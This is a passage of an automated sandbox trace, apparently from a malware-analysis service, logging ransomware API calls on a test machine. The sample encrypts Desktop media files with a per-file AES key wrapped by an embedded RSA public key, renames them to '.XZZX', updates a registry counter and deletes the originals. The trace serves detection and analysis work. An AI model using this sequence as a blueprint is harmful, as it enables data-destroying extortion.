f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0166.218] lstrcpyW (in: lpString1=0x2caf460, lpString2="qWhs9jNagvnL0I2S.avi" | out: lpString1="qWhs9jNagvnL0I2S.avi") returned="qWhs9jNagvnL0I2S.avi" [0166.218] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0166.218] SetErrorMode (uMode=0x1) returned 0x1 [0166.218] lstrcpyW (in: lpString1=0x2caf860, lpString2="qWhs9jNagvnL0I2S.avi" | out: lpString1="qWhs9jNagvnL0I2S.avi") returned="qWhs9jNagvnL0I2S.avi" [0166.218] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x7e04b2c9, Data2=0xed1f, Data3=0x45ad, Data4=([0]=0xbb, [1]=0xc, [2]=0xdd, [3]=0x55, [4]=0x7e, [5]=0x6f, [6]=0x19, [7]=0x34))) returned 0x0 [0166.219] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qWhs9jNagvnL0I2S.avi") returned 62 [0166.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0166.219] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9C15BB57408998F37E04B2C943547D3B.XZZX") returned 79 [0166.219] StrStrW (lpFirst="qWhs9jNagvnL0I2S.avi", lpSrch="XZZX") returned 0x0 [0166.219] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qWhs9jNagvnL0I2S.avi", dwFileAttributes=0x20) returned 1 [0166.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qWhs9jNagvnL0I2S.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qwhs9jnagvnl0i2s.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x980 [0166.219] ReadFile (in: hFile=0x980, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0xe392, lpNumberOfBytesRead=0x2cae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x2cae418*=0xe392, lpOverlapped=0x0) returned 1 [0166.220] CloseHandle (hObject=0x980) returned 1 [0166.220] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0166.220] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0166.221] SetErrorMode (uMode=0x1) returned 0x1 [0166.221] lstrcpyW (in: lpString1=0x2cae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0166.221] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc2530) returned 1 [0166.224] CryptGenKey (in: hProv=0x3cc2530, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x43728b8) returned 1 [0166.471] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x2cae41c | out: pbData=0x0*, pdwDataLen=0x2cae41c*=0x94) returned 1 [0166.471] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x2cae41c | out: pbData=0x1cb0000*, pdwDataLen=0x2cae41c*=0x94) returned 1 [0166.471] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0166.471] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0166.471] CryptDestroyKey (hKey=0x43728b8) returned 1 [0166.472] CryptReleaseContext (hProv=0x3cc2530, dwFlags=0x0) returned 1 [0166.472] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9C15BB57408998F37E04B2C943547D3B.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9c15bb57408998f37e04b2c943547d3b.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x97c [0166.475] WriteFile (in: hFile=0x97c, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0xe392, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x2cae438*=0xe392, lpOverlapped=0x0) returned 1 [0166.476] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe392 [0166.476] WriteFile (in: hFile=0x97c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2cae438*=0x5, lpOverlapped=0x0) returned 1 [0166.476] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe397 [0166.476] WriteFile (in: hFile=0x97c, lpBuffer=0x2caf860*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x2caf860*, lpNumberOfBytesWritten=0x2cae438*=0x28, lpOverlapped=0x0) returned 1 [0166.476] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe3bf [0166.476] WriteFile (in: hFile=0x97c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2cae438*=0x5, lpOverlapped=0x0) returned 1 [0166.476] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe3c4 [0166.476] SetErrorMode (uMode=0x1) returned 0x1 [0166.476] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0166.476] OutputDebugStringW (lpOutputString="end") [0166.476] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`ÕÊ\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x2cadbf4, pcbBinary=0x2cad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2cadbf4, pcbBinary=0x2cad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0166.477] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2cadbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2cad3dc, pcbStructInfo=0x2cad3d8 | out: pvStructInfo=0x2cad3dc, pcbStructInfo=0x2cad3d8) returned 1 [0166.477] CryptAcquireContextW (in: phProv=0x2cad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2cad3e4*=0x3cc2530) returned 1 [0166.477] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc2530, dwCertEncodingType=0x1, pInfo=0x437ed48*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437ed78*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437ed80*, PublicKey.cUnusedBits=0x0), phKey=0x2cad3ec | out: phKey=0x2cad3ec*=0x4372a38) returned 1 [0166.477] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0166.478] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0166.478] CryptEncrypt (in: hKey=0x4372a38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2cad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x2cad3f0*=0x80) returned 1 [0166.478] CryptEncrypt (in: hKey=0x4372a38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc25b8*, pdwDataLen=0x2cad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc25b8*, pdwDataLen=0x2cad3e8*=0x80) returned 1 [0166.478] WriteFile (in: hFile=0x97c, lpBuffer=0x3cc25b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc25b8*, lpNumberOfBytesWritten=0x2cae438*=0x80, lpOverlapped=0x0) returned 1 [0166.478] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0166.478] WriteFile (in: hFile=0x97c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2cae438*=0x5, lpOverlapped=0x0) returned 1 [0166.478] GetUserNameW (in: lpBuffer=0x2cae1f8, pcbBuffer=0x2cadfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2cadfe0) returned 1 [0166.478] wsprintfW (in: param_1=0x2cadff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0166.478] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2cadfe4 | out: phkResult=0x2cadfe4*=0x988) returned 0x0 [0166.478] RegQueryValueExW (in: hKey=0x988, lpValueName="E1010314", lpReserved=0x0, lpType=0x2cadfd8, lpData=0x2cadfec, lpcbData=0x2cadfdc*=0x4 | out: lpType=0x2cadfd8*=0x4, lpData=0x2cadfec*=0xeb, lpcbData=0x2cadfdc*=0x4) returned 0x0 [0166.478] RegCloseKey (hKey=0x988) returned 0x0 [0166.479] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2cadfe8 | out: phkResult=0x2cadfe8*=0x988) returned 0x0 [0166.479] RegSetValueExW (in: hKey=0x988, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x2cadfec*=0xec, cbData=0x4 | out: lpData=0x2cadfec*=0xec) returned 0x0 [0166.479] RegCloseKey (hKey=0x988) returned 0x0 [0166.479] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0166.479] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0166.479] CloseHandle (hObject=0x97c) returned 1 [0166.479] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0166.480] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0166.480] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qWhs9jNagvnL0I2S.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qwhs9jnagvnl0i2s.avi")) returned 1 [0166.481] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qWhs9jNagvnL0I2S.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qwhs9jnagvnl0i2s.avi")) returned 0 Thread: id = 561 os_tid = 0x1c8 [0166.473] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0166.473] lstrcpyW (in: lpString1=0x29af460, lpString2="R29FEAYxqzGKfm4iuq.wav" | out: lpString1="R29FEAYxqzGKfm4iuq.wav") returned="R29FEAYxqzGKfm4iuq.wav" [0166.473] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0166.473] SetErrorMode (uMode=0x1) returned 0x1 [0166.473] lstrcpyW (in: lpString1=0x29af860, lpString2="R29FEAYxqzGKfm4iuq.wav" | out: lpString1="R29FEAYxqzGKfm4iuq.wav") returned="R29FEAYxqzGKfm4iuq.wav" [0166.473] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xb7a5a481, Data2=0x25f8, Data3=0x4eba, Data4=([0]=0x99, [1]=0xad, [2]=0xb5, [3]=0xfe, [4]=0x2e, [5]=0x90, [6]=0xad, [7]=0x4e))) returned 0x0 [0166.473] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R29FEAYxqzGKfm4iuq.wav") returned 64 [0166.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0166.473] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D93E01F80BAD2630B7A5A4810E480A78.XZZX") returned 79 [0166.473] StrStrW (lpFirst="R29FEAYxqzGKfm4iuq.wav", lpSrch="XZZX") returned 0x0 [0166.473] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R29FEAYxqzGKfm4iuq.wav", dwFileAttributes=0x20) returned 1 [0166.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R29FEAYxqzGKfm4iuq.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\r29feayxqzgkfm4iuq.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x974 [0166.481] ReadFile (in: hFile=0x974, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0xcca7, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0xcca7, lpOverlapped=0x0) returned 1 [0166.482] CloseHandle (hObject=0x974) returned 1 [0166.482] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0166.482] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0166.482] SetErrorMode (uMode=0x1) returned 0x1 [0166.482] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0166.482] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc2640) returned 1 [0166.484] CryptGenKey (in: hProv=0x3cc2640, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x43728b8) returned 1 [0166.641] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0166.641] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0166.641] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0166.642] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0166.642] CryptDestroyKey (hKey=0x43728b8) returned 1 [0166.642] CryptReleaseContext (hProv=0x3cc2640, dwFlags=0x0) returned 1 [0166.642] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D93E01F80BAD2630B7A5A4810E480A78.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d93e01f80bad2630b7a5a4810e480a78.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x97c [0166.643] WriteFile (in: hFile=0x97c, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0xcca7, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0xcca7, lpOverlapped=0x0) returned 1 [0166.643] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xcca7 [0166.644] WriteFile (in: hFile=0x97c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0166.644] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xccac [0166.644] WriteFile (in: hFile=0x97c, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x2c, lpOverlapped=0x0) returned 1 [0166.644] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xccd8 [0166.644] WriteFile (in: hFile=0x97c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0166.644] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xccdd [0166.644] SetErrorMode (uMode=0x1) returned 0x1 [0166.644] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0166.644] OutputDebugStringW (lpOutputString="end") [0166.644] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v¨\x8eÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0166.644] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0166.644] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x3cc2640) returned 1 [0166.645] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc2640, dwCertEncodingType=0x1, pInfo=0x437ee18*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437ee48*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437ee50*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372a78) returned 1 [0166.645] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0166.645] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0166.645] CryptEncrypt (in: hKey=0x4372a78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0166.645] CryptEncrypt (in: hKey=0x4372a78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc26c8*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc26c8*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0166.645] WriteFile (in: hFile=0x97c, lpBuffer=0x3cc26c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc26c8*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0166.645] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0166.645] WriteFile (in: hFile=0x97c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0166.645] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0166.645] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0166.646] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x988) returned 0x0 [0166.646] RegQueryValueExW (in: hKey=0x988, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xec, lpcbData=0x29adfdc*=0x4) returned 0x0 [0166.646] RegCloseKey (hKey=0x988) returned 0x0 [0166.646] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x988) returned 0x0 [0166.646] RegSetValueExW (in: hKey=0x988, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xed, cbData=0x4 | out: lpData=0x29adfec*=0xed) returned 0x0 [0166.646] RegCloseKey (hKey=0x988) returned 0x0 [0166.646] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0166.646] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0166.646] CloseHandle (hObject=0x97c) returned 1 [0166.691] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0166.692] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0166.692] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R29FEAYxqzGKfm4iuq.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\r29feayxqzgkfm4iuq.wav")) returned 1 [0166.693] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 